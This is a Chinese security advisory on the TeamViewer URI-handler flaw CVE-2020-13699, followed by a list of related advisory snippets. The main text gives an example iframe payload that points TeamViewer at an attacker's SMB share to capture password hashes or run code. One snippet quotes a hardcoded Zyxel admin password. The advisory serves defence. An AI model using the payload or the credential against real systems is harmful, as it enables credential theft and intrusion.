【風險通告】TeamViewer 用戶密碼破解漏洞

2021-02-24 雁行安全團隊


近日,TeamViewer 官方發布了 TeamViewer 用戶密碼破解漏洞 的風險通告,漏洞概況如下:

CVE編號

CVE-2020-13699風險等級高危
利用條件
訪問攻擊者精心構造的惡意頁面

TeamViewer是一款可以隨時隨地連接到遠程桌面電腦、行動裝置及Iot,讓遠程連接過程更加的快速和安全,輕鬆實現對文件、網絡及程序的實時支持或訪問的遠程連接控制軟體。

TeamViewer多個版本中存在 用戶密碼破解漏洞,攻擊者通過讓被攻擊者點擊精心構造的嵌入惡意iframe(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')的網頁,以啟動TeamViewer Windows桌面客戶端並打開一個遠程SMB共享,即可轉發該請求(使用類似響應者)以執行代碼(或捕獲以進行哈希破解)。

復現過程

1.構造嵌入惡意iframe的頁面。

2.訪問惡意頁面,即可啟動TeamViewer。

雁行安全團隊建議TeamViewer用戶及時對受影響版本的TeamViewer進行升級。

升級至最新版本 15.8.3,下載連結如下:

https://www.teamviewer.com/en/download/previous-versions/https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

https://nvd.nist.gov/vuln/detail/CVE-2020-13699

如需應急支持,請聯繫雁行安全團隊。

應急響應聯繫電話:400-029-4789 【轉2】

雁行安全團隊

專注於為客戶提供網絡信息化安全服務

西安四葉草安全雁行安全團隊,以攻防技術作為核心競爭力,集紅隊攻防、漏洞挖掘、安全服務為一體,擁有10餘年安全服務經驗,4100+安全服務項目經驗,服務項目涵蓋了政府、金融、運營商、衛計、交通、企業、網際網路等多個行業,通過將來自一線的經驗變成用戶所需要的安全服務,從而保障客戶相關重要系統和資源的安全,有效地減少用戶單位由於安全問題引起的不可估量的損失。

相關焦點

  • CVE-2020-13699: TeamViewer 用戶密碼破解漏洞通告
    報告編號:B6-2020-081002報告來源:360CERT報告作者:360CERT更新日期:2020-08-100x01 漏洞簡述2020年08月10日,360CERT監測發現TeamViewer官方發布了TeamViewerURL處理的風險通告,該漏洞編號為CVE-2020-13699,漏洞等級:高危,漏洞評分:8.8分。
  • 漏洞通告|TeamViewer 遠程代碼執行漏洞通告 (CVE-2020-13699)
    近日,TeamViewer官方發布了TeamViewer URL處理的風險通告。TeamViewer存在未引用的搜索路徑或元素的安全缺陷,由於應用程式沒有正確引用它的自定義URI處理程序,當安裝了TeamViewer的易受攻擊版本的用戶訪問惡意創建的網站時,可能會被黑客利用。
  • TeamViewer 遠程代碼執行漏洞通告 (CVE-2020-13699)
    2020年8月6日,TeamViewer官方發布了TeamViewer URL處理的風險通告。TeamViewer存在未引用的搜索路徑或元素的安全缺陷,由於應用程式沒有正確引用它的自定義URI處理程序,當安裝了TeamViewer的易受攻擊版本的用戶訪問惡意創建的網站時,可能會被黑客利用。深信服安全研究團隊依據漏洞重要性和影響力進行評估,作出漏洞通告。
  • TeamViewer遠程代碼執行漏洞通告(CVE-2020-13699)
    近日,新華三攻防團隊監測到TeamViewer官方發布了TeamViewer URL處理的風險通告,並進行了跟蹤和分析。TeamViewer存在未引用的搜索路徑或元素的安全缺陷,由於應用程式沒有正確引用其自定義URI處理程序,導致程序將參數視為系統命令而不是值。
  • TeamViewer全系版本曝漏洞 無需密碼即可入侵電腦
    基於Windows平臺的TeamViewer 15.8.3之前版本中存在安全漏洞,該漏洞源於程序無法正確引用其自定義URI處理程序。攻擊者可藉助特製參數利用該漏洞啟動TeamViewer。攻擊者無需密碼,此外,由於SMB共享,並且是受害者的計算機發起與攻擊者的SMB共享的連接,因此攻擊者不需要知道用戶的密碼。
  • TeamViewer 全系版本漏洞!無需密碼即可控制你電腦
    但是由於國內某個公司的代理,把這個軟體的環境弄得烏煙瘴氣,並且到現在官方為了加強防破解,除了各種各樣的驗證,你要遠程用戶,用戶還必須登錄帳號,顯得非常麻煩。樹大招風,這個軟體也一直被黑客所青睞,在以前爆出過很多漏洞。但是就在前幾天,這款軟體被爆出了最嚴重的安全漏洞。
  • TeamViewer全系版本曝無需密碼即可入侵你電腦漏洞(含POC)!
    成功利用此錯誤後,該錯誤將使未經身份驗證的遠程角色在Windows PC上執行任意代碼,或獲得密碼哈希(例如,通過蠻力破解)。漏洞編號:CVE-2020-13699,嚴重程度8.8分。屬於特殊的安全漏洞類別,稱為「  無引號的搜索路徑或元素(CWE-428)」。這些利用了以下事實:傳遞給程序的參數不被「引用」。
  • 【高危安全通告】NetLogon特權提升漏洞風險通告
    最常用於讓用戶使用 NTLM 協議登錄伺服器,也用於 NTP 響應認證以及更新計算機域密碼。安全狗安全威脅情報中心注意到有國外安全廠商將NetLogon特權提升漏洞(CVE-2020-1472)的詳細技術分析和驗證腳本公開上傳到github。該漏洞高度危險,漏洞利用代碼公開意味著大規模的漏洞利用將很快到來。
  • TeamViewer遠程控制被黑客攻破
    大量玩家使用的遠程手機控制電腦軟體10月11日,深圳市網絡與信息安全信息通報中心發出緊急通告,指出目前知名遠程辦公工具
  • TeamViewer全系版本曝無需密碼即可入侵你電腦漏洞(含POC),速度升級!!!附下載!
    是目前國內外流行的遠程訪問和故障排除應用程式,TeamViewer官方發布消息說最近修復了一個漏洞,該漏洞可能使攻擊者悄悄地建立與您計算機的連接並進一步利用該系統。該漏洞影響TeamViewer版本8,9, 10,11,12,13,14,15全系列產品!
  • 【安全風險通告】Linux sudo堆溢出本地提權漏洞安全風險通告
    奇安信CERT致力於第一時間為企業級用戶提供安全風險通告和
  • Dnsmasq: 多個高危漏洞風險通告
    DNSpooq是JSOF命名的本次披露的漏洞的統稱,該報告主要圍繞dnsmasq的漏洞展開。總計包含2處高危漏洞,2處中危漏洞,3處低危漏洞。dnsmasq中存在多個高危漏洞,影響DNS服務正常的提供,並導致DNS緩存投毒引發以下後果1. 域名劫持(網站訪問劫持、數據竊取)2.
  • 【安全風險通告】Shiro又爆高危漏洞,Apache Shiro身份驗證繞過漏洞安全風險通告
    鑑於該漏洞影響較大,建議客戶儘快升級到最新版本。Apache Shiro是一個強大且易用的Java安全框架,通過它可以執行身份驗證、授權、密碼和會話管理。使用Shiro的易用API,您可以快速、輕鬆地保護任何應用程式——從最小的行動應用程式到最大的WEB和企業應用程式。
  • Windows版TeamViewer漏洞復現
    ,可能被遠程攻擊者利用來破解用戶的密碼,從而導致進一步的系統利用。 近日TeamViewer團隊發布了8-15的全版本的軟體推送,在官方發布的安全公告中,修復了CVE-2020-13699漏洞。該漏洞使得程序無法正確引用其自定義URI處理程序,導致攻擊者可以通過構建惡意的URI,通過精心製作URL將惡意的iframe嵌入到網頁中。
  • 黑客可利用 TeamViewer 缺陷遠程竊取系統密碼
    TeamViewer 團隊最近發布版本更新,修復了嚴重漏洞 (CVE-2020-13699)。該漏洞如遭利用可導致遠程攻擊者竊取系統密碼並最終攻陷系統。這樣做的後果是觸發 SMB 認證攻擊,洩露系統用戶名和密碼的 NTLMv2 哈希版本,進而利用被盜憑據認證受害者的計算機或網絡資源。要成功利用該漏洞,攻擊者需要將惡意 iframe 嵌入網站並誘騙受害者訪問惡意構造的 URL。受害者點擊後,TeamViewer 將自動啟動 Windows 桌面客戶端並打開遠程 SMB 共享。
  • TeamViewer高危漏洞可洩露用戶密碼
    近日,安全人士在TeamViewer 15.8.3之前的Windows桌面版本中發現了高危漏洞(CVE-2020-13699)。通過利用此漏洞,攻擊者可以在受害者的系統上遠程執行代碼或破解其TeamViewer密碼。TeamViewer是一種非常流行的遠程辦公應用程式,允許用戶遠程控制一系列智能設備,以執行文件傳輸、桌面共享和網絡會議等功能。
  • TeamViewer 全系版本漏洞,無需密碼即可控制你電腦!
    「TeamViewer 嚴重漏洞!成功利用此漏洞後,該漏洞將使未經身份驗證的遠程角色在Windows PC上執行任意代碼,或獲得密碼」」TeamViewer版本8,9, 10,11,12,13,14,15所有大版本,都能被執行。「當小編今天知道TeamViewer升級新版本修復了之前從未被發現過的上述嚴重漏洞後,內心幾乎是崩潰的。
  • 【漏洞通告】Zyxel多個設備密碼硬編碼漏洞(CVE-2020-29583)
    2021年01月05日,深信服安全團隊監測到存在Zyxel多個設備密碼硬編碼漏洞的信息,漏洞編號:CVE-2020-29583,漏洞:高危。該漏洞是由於Zyxel 防火牆和 AP 控制器中存在一個admin 權限的默認帳戶「zyfwp」,其密碼硬編碼為 「PrOw!aN_fXp」,攻擊者可利用該漏洞暴露的帳戶以管理員權限登錄,獲取設備最高權限。
  • VMware 多個產品中危漏洞安全風險通告
    0x00 事件背景2020年06月11日, 360CERT監測發現 VMware 發布了 桌面虛擬化產品多個漏洞 的風險通告,事件等級
  • 【漏洞通告】TerraMaster TOS多個漏洞通告
    2020年12月12日,Dir00t在ihteam發表博客公開TerraMaster TOS 4.2.06多個漏洞,其中包括遠程命令執行漏洞。2020年12月24日,NVD分配TerraMaster TOS漏洞CVE編號。深信服安全研究團隊依據漏洞重要性和影響力進行評估,作出漏洞通告。